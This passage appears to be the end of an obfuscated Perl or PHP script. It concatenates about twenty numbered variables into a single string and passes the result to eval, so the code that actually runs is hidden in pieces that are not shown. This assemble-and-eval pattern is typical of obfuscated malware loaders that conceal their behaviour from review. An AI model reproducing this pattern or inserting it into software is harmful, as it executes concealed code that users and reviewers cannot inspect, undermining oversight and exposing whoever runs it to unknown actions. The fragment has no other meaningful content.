$krcg1696.$krcg1697.$krcg1698.$krcg1699.$krcg1700.$krcg1701.$krcg1702.$krcg1703.
$krcg1704.$krcg1705.
$krcg1706.$krcg1707.$krcg1708.$krcg1709.$krcg1710.$krcg1711.$krcg1712.$krcg1713.$krcg1714.$krcg1715;$c='krcg';eval $krcg;